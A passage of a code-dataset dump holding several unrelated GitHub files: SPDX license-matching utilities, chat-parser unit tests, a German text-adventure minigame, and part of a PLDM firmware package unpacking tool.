bitcodin.VttMpdRequest(job_result.job_id, subtitles)\n\nres = bitcodin.create_vtt_mpd(vtt_mpd_request)\nprint(res.mpd_url)\n","repo_name":"bitmovin/bitcodin-python","sub_path":"examples/create_vtt_mpd.py","file_name":"create_vtt_mpd.py","file_ext":"py","file_size_in_byte":1871,"program_lang":"python","lang":"en","doc_type":"code","stars":21,"dataset":"github-code","pt":"53"} +{"seq_id":"42808959915","text":"import gzip\nimport os\nfrom io import BytesIO\n\nimport jpype\nimport requests\n\n\ndef colors(string, color):\n \"\"\"To make things colorful\n\n Arguments:\n string {string} -- string to be colored.\n color {integer} -- color\n \"\"\"\n return(\"\\033[%sm%s\\033[0m\" % (color, string))\n\n\ndef decompressBytesToString(inputBytes):\n \"\"\"Decompress the given byte array (which must be valid\n compressed gzip data) and return the decoded text (utf-8).\n\n Arguments:\n inputBytes {bytes} -- A valid compressed gzip byte array\n\n Returns:\n string -- utf-8 decoded text\n \"\"\"\n buf = BytesIO()\n stream = BytesIO(inputBytes)\n decompressor = gzip.GzipFile(fileobj=stream, mode='r')\n while True: # until EOF\n chunk = decompressor.read(8192)\n if not chunk:\n decompressor.close()\n buf.seek(0)\n return buf.read().decode(\"utf-8\")\n buf.write(chunk)\n return None\n\n\ndef compressStringToBytes(inputString):\n \"\"\"Read the given string, encode it in utf-8, compress\n the data and return it as a byte array.\n\n Arguments:\n inputString {[type]} -- inputString is the license text of the 
license.\n\n Returns:\n byte -- A compressed gzip byte array.\n \"\"\"\n buf = BytesIO()\n buf.write(inputString.encode(\"utf-8\"))\n buf.seek(0)\n stream = BytesIO()\n compressor = gzip.GzipFile(fileobj=stream, mode='w')\n while True: # until EOF\n chunk = buf.read(8192)\n if not chunk: # EOF?\n compressor.close()\n return stream.getvalue()\n compressor.write(chunk)\n\n\ndef getListedLicense(licenseId):\n \"\"\"Get a SPDX listed license if the given SPDX license ID is present in the SPDX license list otherwise null.\n\n Arguments:\n licenseId {string} -- SPDX listed license ID\n\n Returns:\n string -- SPDX listed license or null\n \"\"\"\n if (jpype.isJVMStarted()==0):\n\n # If JVM not already started, start it, attach a Thread and start processing the request\n dirpath = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))\n classpath = os.path.join(dirpath, \"tool.jar\")\n jpype.startJVM(jpype.getDefaultJVMPath(), \"-ea\", \"-Djava.class.path=%s\"%classpath)\n\n # Attach a Thread and start processing the request\n jpype.attachThreadToJVM()\n package = jpype.JPackage(\"org.spdx.library.model.license\")\n licenseinfofactoryclass = package.LicenseInfoFactory\n try:\n\n # Call the method getListedLicenseById present in the SPDX Tools\n listed_license = licenseinfofactoryclass.getListedLicenseById(licenseId)\n jpype.detachThreadFromJVM()\n return listed_license\n except:\n jpype.detachThreadFromJVM()\n raise\n\n\ndef checkTextStandardLicense(license, compareText):\n \"\"\"Compares the license text to the license text of SPDX Standard License.\n\n Arguments:\n license {string} -- SPDX standard license.\n compareText {string} -- Text to compare with the standard license.\n\n Returns:\n string -- Difference message if any differences found or None.\n \"\"\"\n\n if (jpype.isJVMStarted()==0):\n\n # If JVM not already started, start it, attach a Thread and start processing the request\n dirpath = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))\n classpath = os.path.join(dirpath, \"tool.jar\")\n jpype.startJVM(jpype.getDefaultJVMPath(), \"-ea\", \"-Djava.class.path=%s\"%classpath)\n\n # Attach a Thread and start processing the request\n jpype.attachThreadToJVM()\n package = jpype.JPackage(\"org.spdx.utility.compare\")\n compareclass = package.LicenseCompareHelper\n try:\n\n # Call the java method isTextStandardLicense present in the SPDX Tools\n diff = compareclass.isTextStandardLicense(license, compareText)\n isDifferenceFound = jpype.JBoolean(diff.isDifferenceFound())\n jpype.detachThreadFromJVM()\n return isDifferenceFound\n except:\n jpype.detachThreadFromJVM()\n raise\n\n\ndef get_spdx_license_text(licenseId):\n \"\"\"Get the SPDX license text of the closely matched license.\n\n Arguments:\n licenseId {string} -- License Id of the closely matched license.\n\n Returns:\n string -- returns the spdx license text.\n \"\"\"\n try:\n res = requests.get('https://spdx.org/licenses/{}.json'.format(licenseId))\n res.raise_for_status()\n except requests.exceptions.HTTPError as e:\n raise\n except requests.exceptions.RequestException as e:\n raise\n return res.json()['licenseText']\n","repo_name":"spdx/spdx-license-matcher","sub_path":"spdx_license_matcher/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":4570,"program_lang":"python","lang":"en","doc_type":"code","stars":20,"dataset":"github-code","pt":"53"} +{"seq_id":"20186162084","text":"import ace\nimport json\nimport unittest\n\n\nclass AceParsingTestCase(unittest.TestCase):\n input = ''\n output = {}\n\n def 
setUp(self):\n self.maxDiff = 10000\n self.app = ace.app.test_client()\n\n def runTest(self):\n res = self.app.post('/parse', data={'message': self.input})\n self.assertEqual(json.loads(res.data), self.output)\n\n\nclass SimpleMentiontest(AceParsingTestCase):\n input = '@chris you around?'\n output = {\n 'mentions': [\n 'chris'\n ]\n }\n\n\nclass MultiMentionTest(AceParsingTestCase):\n input = ' @marty marty @tim @tim joe '\n output = {\n 'mentions': [\n 'marty',\n 'tim',\n 'tim'\n ]\n }\n\n\nclass SimpleEmoticonTest(AceParsingTestCase):\n input = 'Good morning! (megusta) (coffee)'\n output = {\n 'emoticons': [\n 'megusta',\n 'coffee'\n ]\n }\n\n\nclass MultiEmoticonTest(AceParsingTestCase):\n input = '(coffee) (coffee) (coffee)'\n output = {\n 'emoticons': [\n 'coffee',\n 'coffee',\n 'coffee'\n ]\n }\n\n\nclass ParenthesizedMentionNotParsed(AceParsingTestCase):\n input = 'hey (@foobar) hey'\n output = {}\n\n\nclass NoTitleForNonexistentLink(AceParsingTestCase):\n input = 'this is bad @marty: http://kjwekjtwet'\n output = {\n 'mentions': [\n 'marty'\n ],\n 'links': [\n {\n 'url': 'http://kjwekjtwet',\n 'title': ace.ace.TEXT_FOR_UNAVAIL_TITLE\n }\n ]\n }\n\n\nclass SimpleLinkTest(AceParsingTestCase):\n input = 'Olympics are starting soon; http://www.nbcolympics.com'\n output = {\n \"links\": [\n {\n \"url\": \"http://www.nbcolympics.com\",\n \"title\": \"2018 PyeongChang Olympic Games | NBC Olympics\"\n }\n ]\n }\n\n\nclass AllTokenTypesTest(AceParsingTestCase):\n input = '@bob @john (success) such a cool feature; https://twitter.com/jdorfman/status/430511497475670016'\n output = {\n \"mentions\": [\n \"bob\",\n \"john\"\n ],\n \"emoticons\": [\n \"success\"\n ],\n \"links\": [\n {\n \"url\": \"https://twitter.com/jdorfman/status/430511497475670016\",\n \"title\": \"Justin Dorfman on Twitter: "nice @littlebigdetail from @HipChat (shows hex colors when pasted in chat). http://t.co/7cI6Gjy5pq"\"\n }\n ]\n }\n\n\nif __name__ == '__main__':\n unittest.main()","repo_name":"woodlee/ace","sub_path":"test_ace.py","file_name":"test_ace.py","file_ext":"py","file_size_in_byte":2529,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"23903473091","text":"import Source.EngineL.Core as Core\n\nclass BigHeap(Core.StaticEntity):\n \"\"\"\n The big Heap\n \"\"\"\n\n def __init__(self, parent=None):\n Core.StaticEntity.__init__(self, parent)\n self.setObjectName(\"großer Haufen\")\n self.description = \"Dieser große Haufen verstopft den Fluss, er macht den Weg zum Hafen\\\n unzugängig und bedroht das Dorf!\"\n self.gender = \"m\"\n self.activly_usable = True\n self.set_state(\"used\", 0)\n\n def on_used(self, user, other_entity=None):\n if other_entity is None and self.get_state(\"used\") == 0:\n user.get_window().show_text(\"Ach nein! Der Müll steckt ziemlich fest, es tut sich\\\n einfach überhaupt nichts. Ich versuch' es gleich nochmal.\")\n self.set_state(\"used\", 1)\n return True\n if other_entity is None and self.get_state(\"used\") == 1:\n user.get_window().show_text(\"Es tut sich was! Ich glaub ich hab die Schwachstelle\\\n gefunden. Ein präziser Tritt und das Dorf ist gerettet.\")\n self.set_state(\"used\", 2)\n return True\n if other_entity is None and self.get_state(\"used\") == 2:\n user.get_window().show_text(\"WOAH!!! Ich sollte vorsichtiger sein, fast hätte mich die\\\n Strömung mit gerissen. 
Frei ist der Fluss jetzt auch noch nicht, aber ich glaub' da\\\n hat sich was getan.\")\n self.set_state(\"used\", 3)\n return True\n if other_entity is None and self.get_state(\"used\") == 3:\n user.get_window().show_text(\"Jawoll, der Wasserspiegel senkt sich, jedoch wird noch\\\n immer Müll angespült, der in der Lage ist, den Fluss in einen riesigen Damm zu\\\n verwandeln. Ich sollte schnell was dagegen, unternehmen bevor sich erneut was ansammeln\\\n kann!\")\n rth_name = Core.get_res_man().get_string(\"game.places.roadToHabour.name\")\n road_to_habour = Core.SinglePlayerApp.instance().findChild(Core.Place, rth_name)\n road_to_habour.spawn(\"trash\")\n self.transfer(None)\n return True\n return False\n\nclass Trash(Core.StaticEntity):\n \"\"\"\n The big Heap\n \"\"\"\n\n def __init__(self, parent=None):\n Core.StaticEntity.__init__(self, parent)\n self.setObjectName(\"Müll\")\n self.description = \"Der Müll muss noch immer vom Berg bis hierhin angespült worden sein.\"\n self.gender = \"m\"\n self.activly_usable = True\n self.set_state(\"used\", 0)\n self.show_article = False\n def on_used(self, user, other_entity=None):\n if other_entity is None and self.get_state(\"used\") == 0:\n user.get_window().show_text(\"Schön langsam, Ivy. Nur weil du den Müll ans Ufer ziehst\\\n musst du nicht gleich im Fluss baden gehen.\")\n self.set_state(\"used\", 1)\n return True\n if other_entity is None and self.get_state(\"used\") == 1:\n user.get_window().show_text(\"Wie viel Müll kommt da denn noch! Irgendwie habe ich mir\\\n den Tag anders vorgestellt.\")\n self.set_state(\"used\", 2)\n return True\n if other_entity is None and self.get_state(\"used\") == 2:\n user.get_window().show_text(\"Wir sollten aufhören unseren Müll auf dem Berg zu lagern,\\\n denn das was hier angespült wird, muss schon mehrere Jahrer dort oben liegen\")\n self.set_state(\"used\", 3)\n return True\n if other_entity is None and self.get_state(\"used\") == 3:\n user.get_window().show_text(\"Moment mal. Das könnte sich vielleicht als nützlich\\\n erweisen und mir die Arbeit erleich... AUFPASSEN! Ich hab wohl gepennt und nicht\\\n gesehen, dass noch immer Müll angeschwemmt wird und erneut ist der Fluss verstopft!\")\n rth_name = Core.get_res_man().get_string(\"game.places.roadToHabour.name\")\n road_to_habour = Core.SinglePlayerApp.instance().findChild(Core.Place, rth_name)\n road_to_habour.spawn(\"shovel\")\n road_to_habour.spawn(\"dam\")\n self.transfer(None)\n return True\n return False\n\nclass Shovel(Core.Entity):\n \"\"\"\n The shovel\n \"\"\"\n def __init__(self, parent=None):\n Core.Entity.__init__(self, parent)\n self.setObjectName(\"Schaufel\")\n self.description = \"Eine alte Schaufel. Jemand muss sie bei der Suche nach Ressourcen oben\\\n auf dem Berg vergessen haben.\"\n self.gender = \"f\"\n\nclass Dam(Core.StaticEntity):\n \"\"\"\n The dam\n \"\"\"\n\n def __init__(self, parent=None):\n Core.StaticEntity.__init__(self, parent)\n self.setObjectName(\"Damm\")\n self.description = \"Dieser Damm ist noch größer als der Haufen an Müll von vorhin. Jetzt\\\n zählt jede Sekunde!\"\n self.gender = \"m\"\n self.activly_usable = True\n self.set_state(\"used\", 0)\n\n def on_used(self, user, other_entity=None):\n if other_entity is None and self.get_state(\"used\") == 0:\n user.get_window().show_text(\"Mit meinen bloßen Händen kann das eine Weile dauern.\")\n self.set_state(\"used\", 1)\n return True\n if other_entity is None and self.get_state(\"used\") == 1:\n user.get_window().show_text(\"Ok, ok. 
Bis auf den Schmerz in meinen Armen und die\\\n Tatsache, dass das Wasser gleich das Dorf erreicht, ist doch alles bestens.\")\n self.set_state(\"used\", 2)\n return True\n if other_entity is None and self.get_state(\"used\") == 2:\n user.get_window().show_text(\"Meine Hände sind nicht gerade so effektiv, wie eine\\\n Schaufel, doch zumindest ist der Damm jetzt fast gebrochen.\")\n self.set_state(\"used\", 3)\n return True\n if other_entity is None and self.get_state(\"used\") == 3:\n user.get_window().show_text(\"GESCHAFFT! Das Dorf ist nicht mehr bedroht und ich kann\\\n endlich wieder zum Hafen, aber warum habe ich nicht die Schaufel von da drüben\\\n benutzt?\")\n rth_name = Core.get_res_man().get_string(\"game.places.roadToHabour.name\")\n road_to_habour = Core.SinglePlayerApp.instance().findChild(Core.Place, rth_name)\n road_to_habour.set_state(\"flooded\", 0)\n self.transfer(None)\n return True\n if isinstance(other_entity, Shovel) and self.get_state(\"used\") <= 1:\n user.get_window().show_text(\"Mit der Schaufel geht das ja kinderleicht, nicht viel mehr\\\n und der Damm ist gebrochen!\")\n self.set_state(\"used\", (self.get_state(\"used\"))+2)\n return True\n if isinstance(other_entity, Shovel) and self.get_state(\"used\") >= 2:\n user.get_window().show_text(\"GESCHAFFT! Das Dorf ist nicht mehr bedroht und ich kann\\\n endlich wieder zum Hafen. Die Schaufel ist jedoch hinüber.\")\n other_entity.transfer(None)\n rth_name = Core.get_res_man().get_string(\"game.places.roadToHabour.name\")\n road_to_habour = Core.SinglePlayerApp.instance().findChild(Core.Place, rth_name)\n road_to_habour.set_state(\"cleared\", 1)\n return True\n return False\n\ndef register_entity_classes(app):\n \"\"\"\n This function registers all of our new Entity classes to the given application instance.\n \"\"\"\n app.register_entity_classes([BigHeap, Trash, Shovel, Dam])\n","repo_name":"ProjectL-Team/ProjectL","sub_path":"Source/Minigame.py","file_name":"Minigame.py","file_ext":"py","file_size_in_byte":7453,"program_lang":"python","lang":"de","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"20595679621","text":"import argparse\nimport hashlib\nimport json\nimport math\nimport os\nimport re\nimport stat\nimport sys\nimport time\nimport uuid\n\nUNPACK_TOOL_VERSION = \"4.0.6\"\n\nclass Util:\n \"\"\"\n Class with static helper functions\n \"\"\"\n LOG_FILE = \"./fwpkg_unpack_log.txt\"\n LOGFILE_PATH = \"\"\n\n @staticmethod\n def cli_log(log_msg, log_file_only=False):\n \"\"\"\n Append log message to cli log file\n \"\"\"\n log_file = Util.LOG_FILE\n\n file_handle = None\n try:\n with open(log_file, \"a+\", encoding=\"utf-8\") as file_handle:\n localtime = time.asctime(time.localtime(time.time()))\n file_handle.write(f\"{localtime} : {log_msg}\\n\")\n Util.LOGFILE_PATH = os.path.abspath(file_handle.name)\n if log_file_only is False:\n print(log_msg)\n except PermissionError as _:\n print(log_msg)\n print(f\"Error: Failed to open or create {log_file}\")\n\n @staticmethod\n def get_descriptor_type_name(desc_type):\n \"\"\"\n Return the descriptive name for given integer descriptor type.\n \"\"\"\n desc_type_dict = {\n 0x0000: \"PCI Vendor ID\",\n 0x0001: \"IANA Enterprise ID\",\n 0x0002: \"UUID\",\n 0x0003: \"PnP Vendor ID\",\n 0x0004: \"ACPI Vendor ID\",\n 0x0005: \"IEEE Assigned Company ID\",\n 0x0006: \"SCSI Vendor ID\",\n 0x0100: \"PCI Device ID\",\n 0x0101: \"PCI Subsystem Vendor ID\",\n 0x0102: \"PCI Subsystem ID\",\n 0x0103: \"PCI Revision ID\",\n 0x0104: \"PnP Product 
Identifier\",\n 0x0105: \"ACPI Product Identifier\",\n 0x0106: \"ASCII Model Number\",\n 0x0107: \"ASCII Model Number\",\n 0x0108: \"SCSI Product ID\",\n 0x0109: \"UBM Controller Device Code\",\n 0xffff: \"Vendor Defined\",\n }\n\n name = desc_type_dict.get(desc_type, f'{desc_type:#x}')\n return name\n\n @staticmethod\n def get_timestamp_str(timestamp):\n \"\"\"\n Return timestamp string from 13 byte binary data\n according to PLDM Base specification\n \"\"\"\n year = timestamp[11]\n year = year << 8\n year = year | timestamp[10]\n time_str = str(year) + \"-\"\n time_str = time_str + str(timestamp[9])\n time_str = time_str + \"-\" + str(timestamp[8])\n time_str = time_str + \" \" + str(timestamp[7])\n time_str = time_str + \":\" + str(timestamp[6])\n time_str = time_str + \":\" + str(timestamp[5])\n micro_sec = timestamp[4]\n micro_sec = micro_sec << 8\n micro_sec = micro_sec | timestamp[3]\n micro_sec = micro_sec << 8\n micro_sec = micro_sec | timestamp[2]\n time_str = time_str + \":\" + str(micro_sec)\n utc_offset = timestamp[1]\n utc_offset = utc_offset << 8\n utc_offset = utc_offset | timestamp[0]\n sign = \"+\"\n if utc_offset < 0:\n utc_offset = utc_offset * -1\n sign = \"-\"\n time_str = time_str + \" \" + sign + str(utc_offset)\n return time_str\n\n @staticmethod\n def get_checksum_for_component_image(fw_image):\n \"\"\"\n Compute SHA256 for the given component image.\n \"\"\"\n sha256 = \"\"\n try:\n with open(fw_image, 'rb') as file_name:\n data = file_name.read()\n sha256 = hashlib.sha256(data).hexdigest()\n except (FileNotFoundError, IOError) as err:\n log_msg = f'Error: {err}'\n Util.cli_log(log_msg, False)\n return sha256\n\n @staticmethod\n def get_padded_hex(byte_arr):\n \"\"\"\n Get hex formatted version of a byte array padded with 0\n \"\"\"\n total_len = len(byte_arr)\n hex_str = hex(\n int.from_bytes(byte_arr, byteorder='little', signed=False))[2:]\n padded_str = '0x' + hex_str.zfill(total_len * 2)\n return padded_str\n\n\nclass PLDMUnpack:\n # pylint: disable=too-many-instance-attributes\n \"\"\"\n PLDMUnpack class implements a PLDM parser and the unpack tool\n along with its required features.\n ...\n Attributes\n ----------\n package : str\n Path/Name of the input firmware package\n unpack : bool\n True if tool should unpack firmware images\n fwpkg_fd : io.TextIOWrapper\n Instance used to read from package file\n header_map : dict\n Stores the PLDM Package Header Information parsed from given package\n device_id_record_count : int\n Number of PLDM FirmwareDeviceIDRecords found in given package\n fd_id_record_list : list\n List of FirmwareDeviceIDRecords parsed from given package\n component_img_info_list : list\n List of ComponentImageInformation parsed from given package\n\n Methods\n -------\n parse_header() :\n Parses PLDM Package Header Information\n parse_device_id_records() :\n Parses FirmwareDeviceIDRecords from package\n parse_component_img_info() :\n Parses ComponentImageInformation from package\n get_image_name_from_records(comp_info_index) :\n Identify records which which contain metadata for image naming\n get_image_name(comp_info_index) :\n Get image name string by appending various metadata\n create_unpacked_files(output_dir) :\n Extract each firmware image in a file\n unpack_pldm_package(package_name, output_dir) :\n Perform complete parsing and extraction of package\n get_applicable_component_index(applicable_component):\n Return applicable_component as list of indices\n get_ec_info(filepath) :\n Get all EC metadata from extraxted firmware\n 
get_ap_metadata(filepath) :\n Get all AP metadata from extraxted firmware\n get_signature_type(fw_image, component_identifier):\n Get Signature type for given firmware image and component identifier\n is_glacier_device(product, device_name):\n Is this device a glacer device\n get_formatted_descriptors(record_desc, components):\n Method to prepare descriptor section for json output\n prepare_records_json():\n Prepares the JSON output.\n\n \"\"\"\n def __init__(self):\n \"\"\"\n Contructor for PLDMUnpack class\n \"\"\"\n self.unpack = True\n self.package = \"\"\n self.fwpkg_fd = 0\n self.header_map = {}\n self.device_id_record_count = 0\n self.fd_id_record_list = []\n self.component_img_info_list = []\n self.full_header = {\n \"PackageHeaderInformation\": {},\n \"FirmwareDeviceIdentificationArea\": {},\n \"ComponentImageInformationArea\": {},\n \"Package Header Checksum\": ''\n }\n self.verbose = False\n self.little_endian_list = [\n \"IANA Enterprise ID\", \"PCI Vendor ID\", \"PCI Device ID\",\n \"PCI Subsystem Vendor ID\", \"PCI Subsystem ID\"\n ]\n\n def parse_header(self):\n \"\"\"\n Parse PLDM header data into self.header_map\n Returns :\n True if parsing successful\n \"\"\"\n # check if UUID is valid\n pldm_fw_header_id_v1_0 = b'\\xf0\\x18\\x87\\x8c\\xcb\\x7d\\x49\\x43\\x98\\x00\\xa0\\x2f\\x05\\x9a\\xca\\x02'\n uuid_v1_0 = str(uuid.UUID(bytes=pldm_fw_header_id_v1_0))\n self.header_map[\"PackageHeaderIdentifier\"] = str(\n uuid.UUID(bytes=self.fwpkg_fd.read(16)))\n if uuid_v1_0 != self.header_map[\"PackageHeaderIdentifier\"]:\n log_msg = \"Expected PLDM v1.0 but PackageHeaderIdentifier is \"\\\n + self.header_map[\"PackageHeaderIdentifier\"]\n Util.cli_log(log_msg, False)\n return False\n self.header_map[\"PackageHeaderFormatRevision\"] = str(\n int.from_bytes(self.fwpkg_fd.read(1),\n byteorder='little',\n signed=False))\n self.header_map[\"PackageHeaderSize\"] = int.from_bytes(\n self.fwpkg_fd.read(2), byteorder='little', signed=False)\n timestamp = self.fwpkg_fd.read(13)\n self.header_map[\"PackageReleaseDateTime\"] = Util.get_timestamp_str(\n timestamp)\n self.header_map[\"ComponentBitmapBitLength\"] = int.from_bytes(\n self.fwpkg_fd.read(2), byteorder='little', signed=False)\n self.header_map[\"PackageVersionStringType\"] = int.from_bytes(\n self.fwpkg_fd.read(1), byteorder='little', signed=False)\n version_str_len = int.from_bytes(self.fwpkg_fd.read(1),\n byteorder='little',\n signed=False)\n self.header_map[\"PackageVersionStringLength\"] = version_str_len\n self.header_map[\"PackageVersionString\"] = self.fwpkg_fd.read(\n version_str_len).decode('utf-8')\n self.full_header[\"PackageHeaderInformation\"] = self.header_map\n return True\n\n def parse_device_id_records(self):\n \"\"\"\n Parse PLDM FirmwareDeviceIDRecords data into self.fd_id_record_list\n Returns:\n True if parsing is successful\n \"\"\"\n # pylint: disable=line-too-long\n self.device_id_record_count = int.from_bytes(self.fwpkg_fd.read(1),\n byteorder='little',\n signed=False)\n for _ in range(self.device_id_record_count):\n id_record_map = {}\n id_record_map[\"RecordLength\"] = int.from_bytes(\n self.fwpkg_fd.read(2), byteorder='little', signed=False)\n id_record_map[\"DescriptorCount\"] = int.from_bytes(\n self.fwpkg_fd.read(1), byteorder='little', signed=False)\n id_record_map[\"DeviceUpdateOptionFlags\"] = int.from_bytes(\n self.fwpkg_fd.read(4), byteorder='little', signed=False)\n id_record_map[\n \"ComponentImageSetVersionStringType\"] = int.from_bytes(\n self.fwpkg_fd.read(1), byteorder='little', 
signed=False)\n id_record_map[\n \"ComponentImageSetVersionStringLength\"] = int.from_bytes(\n self.fwpkg_fd.read(1), byteorder='little', signed=False)\n id_record_map[\"FirmwareDevicePackageDataLength\"] = int.from_bytes(\n self.fwpkg_fd.read(2), byteorder='little', signed=False)\n applicable_component_size = math.ceil(\n self.header_map[\"ComponentBitmapBitLength\"] / 8)\n id_record_map[\"ApplicableComponents\"] = int.from_bytes(\n self.fwpkg_fd.read(applicable_component_size),\n byteorder='little',\n signed=False)\n id_record_map[\n \"ComponentImageSetVersionString\"] = self.fwpkg_fd.read(\n id_record_map[\"ComponentImageSetVersionStringLength\"]\n ).decode('utf-8')\n descriptors = []\n for j in range(id_record_map[\"DescriptorCount\"]):\n descriptor_map = {}\n if j == 0:\n descriptor_map[\"InitialDescriptorType\"] = int.from_bytes(\n self.fwpkg_fd.read(2),\n byteorder='little',\n signed=False)\n descriptor_map[\"InitialDescriptorLength\"] = int.from_bytes(\n self.fwpkg_fd.read(2),\n byteorder='little',\n signed=False)\n value = self.fwpkg_fd.read(\n descriptor_map[\"InitialDescriptorLength\"])\n descriptor_map[\"InitialDescriptorData\"] = value\n\n else:\n descriptor_map[\n \"AdditionalDescriptorType\"] = int.from_bytes(\n self.fwpkg_fd.read(2),\n byteorder='little',\n signed=False)\n descriptor_map[\n \"AdditionalDescriptorLength\"] = int.from_bytes(\n self.fwpkg_fd.read(2),\n byteorder='little',\n signed=False)\n if descriptor_map[\"AdditionalDescriptorType\"] == 0xFFFF:\n descriptor_map[\n \"VendorDefinedDescriptorTitleStringType\"] = int.from_bytes(\n self.fwpkg_fd.read(1),\n byteorder='little',\n signed=False)\n descriptor_map[\n \"VendorDefinedDescriptorTitleStringLength\"] = int.from_bytes(\n self.fwpkg_fd.read(1),\n byteorder='little',\n signed=False)\n descriptor_map[\n \"VendorDefinedDescriptorTitleString\"] = self.fwpkg_fd.read(\n descriptor_map[\n \"VendorDefinedDescriptorTitleStringLength\"]\n ).decode('utf-8')\n vendor_def_data_len = (\n descriptor_map[\"AdditionalDescriptorLength\"] -\n (2 + descriptor_map[\n \"VendorDefinedDescriptorTitleStringLength\"]))\n descriptor_map[\n \"VendorDefinedDescriptorData\"] = self.fwpkg_fd.read(\n vendor_def_data_len).hex()\n else:\n descriptor_map[\n \"AdditionalDescriptorIdentifierData\"] = self.fwpkg_fd.read(\n descriptor_map[\"AdditionalDescriptorLength\"])\n descriptors.append(descriptor_map)\n id_record_map[\"RecordDescriptors\"] = descriptors\n id_record_map[\"FirmwareDevicePackageData\"] = self.fwpkg_fd.read(\n id_record_map[\"FirmwareDevicePackageDataLength\"]).decode(\n 'utf-8')\n self.fd_id_record_list.append(id_record_map)\n self.full_header[\"FirmwareDeviceIdentificationArea\"] = {\n \"DeviceIDRecordCount\": self.device_id_record_count,\n \"FirmwareDeviceIDRecords\": self.fd_id_record_list\n }\n return True\n\n def parse_component_img_info(self):\n \"\"\"\n Parse PLDM Component Image info data into self.fd_id_record_list\n Returns :\n True if parsing successful\n \"\"\"\n component_image_count = int.from_bytes(self.fwpkg_fd.read(2),\n byteorder='little',\n signed=False)\n for _ in range(component_image_count):\n comp_info = {}\n comp_info[\"ComponentClassification\"] = int.from_bytes(\n self.fwpkg_fd.read(2), byteorder='little', signed=False)\n comp_info[\"ComponentIdentifier\"] = hex(\n int.from_bytes(self.fwpkg_fd.read(2),\n byteorder='little',\n signed=False))\n comp_info[\"ComponentComparisonStamp\"] = int.from_bytes(\n self.fwpkg_fd.read(4), byteorder='little', signed=False)\n comp_info[\"ComponentOptions\"] = 
int.from_bytes(\n self.fwpkg_fd.read(2), byteorder='little', signed=False)\n comp_info[\"RequestedComponentActivationMethod\"] = int.from_bytes(\n self.fwpkg_fd.read(2), byteorder='little', signed=False)\n # RequestedComponentActivationMethod can have any combination of bits 0:5 set\n # Any value above 0x3F is invalid\n activation_val = comp_info[\"RequestedComponentActivationMethod\"]\n if activation_val > 0x3F:\n Util.cli_log(\n f\"Found invalid value for RequestedComponentActivationMethod={activation_val}\",\n True)\n comp_info[\"ComponentLocationOffset\"] = int.from_bytes(\n self.fwpkg_fd.read(4), byteorder='little', signed=False)\n comp_info[\"ComponentSize\"] = int.from_bytes(self.fwpkg_fd.read(4),\n byteorder='little',\n signed=False)\n comp_info[\"ComponentVersionStringType\"] = int.from_bytes(\n self.fwpkg_fd.read(1), byteorder='little', signed=False)\n comp_info[\"ComponentVersionStringLength\"] = int.from_bytes(\n self.fwpkg_fd.read(1), byteorder='little', signed=False)\n comp_info[\"ComponentVersionString\"] = self.fwpkg_fd.read(\n comp_info[\"ComponentVersionStringLength\"]).decode('utf-8')\n self.component_img_info_list.append(comp_info)\n self.full_header[\"ComponentImageInformationArea\"] = {\n \"ComponentImageCount\": component_image_count,\n \"ComponentImageInformation\": self.component_img_info_list\n }\n return True\n\n def get_image_name_from_records(self, comp_info_index):\n \"\"\"\n Identify records which which contain metadata for image at\n index comp_info_index component image info list\n Parameter:\n comp_info_index index of image in component image\n info section\n Returns:\n Name of the applicable record for given image\n or \"\" if nothing found\n \"\"\"\n mask = 1 << comp_info_index\n for rec in self.fd_id_record_list:\n applicable_comp_indices = rec[\"ApplicableComponents\"]\n name = rec[\"ComponentImageSetVersionString\"]\n if mask & applicable_comp_indices == mask:\n if name.find(\",\") == -1:\n return name, rec['RecordDescriptors']\n components = name.split(\",\")\n applicable_comp = applicable_comp_indices\n count = 0\n for _ in range(comp_info_index + 1):\n if applicable_comp & 1 == 1:\n count = count + 1\n applicable_comp = applicable_comp >> 1\n return components[count - 1], rec['RecordDescriptors']\n return \"\", None\n\n def get_image_name(self, comp_info_index):\n \"\"\"\n Create the image name string by appending various metadata\n separated by '_'\n Parameter:\n comp_info_index index of image in component image\n for naming\n Returns:\n Name of the image for unpacking\n or \"\"\n \"\"\"\n comp_info = self.component_img_info_list[comp_info_index]\n name, _ = self.get_image_name_from_records(comp_info_index)\n if name != \"\":\n name = name.replace(\":\", \"_\")\n name = name.replace(\"_N/A\", \"\")\n name = name + \"_\" + comp_info[\"ComponentVersionString\"]\n if name.startswith(\"FW-Package\"):\n name = name + \".fwpkg\"\n else:\n name = name + \"_image.bin\"\n name = re.sub(\"_+\", \"_\", name)\n return name\n\n def create_unpacked_files(self, output_dir):\n \"\"\"\n Extract each firmware image from the\n Firmware Package Payload section of the input file.\n Parameter:\n output_dir path of the directory to store the\n extracted files\n Returns:\n True if unpacking was successful\n \"\"\"\n package_size = os.path.getsize(self.package)\n for index, info in enumerate(self.component_img_info_list):\n offset = info[\"ComponentLocationOffset\"]\n size = info[\"ComponentSize\"]\n if offset + size > package_size:\n log_msg = f\"Error: 
ComponentLocationOffset {offset} + \\\n ComponentSize {size} exceeds given package size {package_size}\"\n\n Util.cli_log(log_msg, False)\n return False\n img_name = output_dir + self.get_image_name(index)\n if img_name == \"\":\n log_msg = \"Error: The input firmware package does not conform to \\\n the format created by NVIDIA packaging tool.\"\n\n Util.cli_log(log_msg, False)\n return False\n try:\n if os.path.exists(img_name):\n os.remove(img_name)\n with open(img_name, \"w+b\") as component_img_fd:\n self.fwpkg_fd.seek(offset, 0)\n bytes_left = size\n buffer_size = 2048\n while bytes_left > 0:\n if bytes_left < 2048:\n buffer_size = bytes_left\n buffer = self.fwpkg_fd.read(buffer_size)\n component_img_fd.write(buffer)\n bytes_left = bytes_left - buffer_size\n info[\"FWImageName\"] = img_name\n if os.path.exists(img_name):\n os.chmod(img_name,\n stat.S_IRUSR | stat.S_IRGRP | stat.S_IROTH)\n except OSError as err:\n log_msg = f\"Error: Could not create file {img_name} due to {err}\"\n Util.cli_log(log_msg, False)\n return False\n return True\n\n def get_pldm_header_checksum(self):\n \"\"\" Read PLDM header checksum \"\"\"\n self.full_header['Package Header Checksum'] = int.from_bytes(\n self.fwpkg_fd.read(4), byteorder='little', signed=False)\n\n def unpack_pldm_package(self, package_name, output_dir):\n \"\"\"\n Parse the PLDM package and get information about components included in the FW image.\n Unpack the package if required.\n Parameters:\n package_name filepath of input package file\n output_dir directory to store the resulting unpacked files\n Returns:\n True if 